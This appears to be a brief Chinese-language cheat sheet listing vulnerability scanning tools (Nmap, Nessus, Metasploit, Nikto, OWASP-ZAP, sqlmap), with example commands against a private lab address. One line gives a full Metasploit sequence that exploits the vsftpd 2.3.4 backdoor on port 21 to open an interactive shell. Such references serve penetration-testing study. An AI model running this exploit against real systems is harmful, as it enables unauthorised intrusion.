漏洞扫描
漏洞扫描
工具
Nmap:
nmap --script vuln 192.168.1.1 -T4
Nessus:
service nessusd start 开启nessus服务
https://127.0.0.1:8834 进入页面后设置target开始扫描
Metasploit:
21端口ftp漏洞利用
msfconsole search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor show payloads set payload cmd/unix/interact set rhost 192.168.1.1 exploit
nikto:(主要针对http服务器)
nikto -host 192.168.1.1
OWASP-ZAP
sqlmap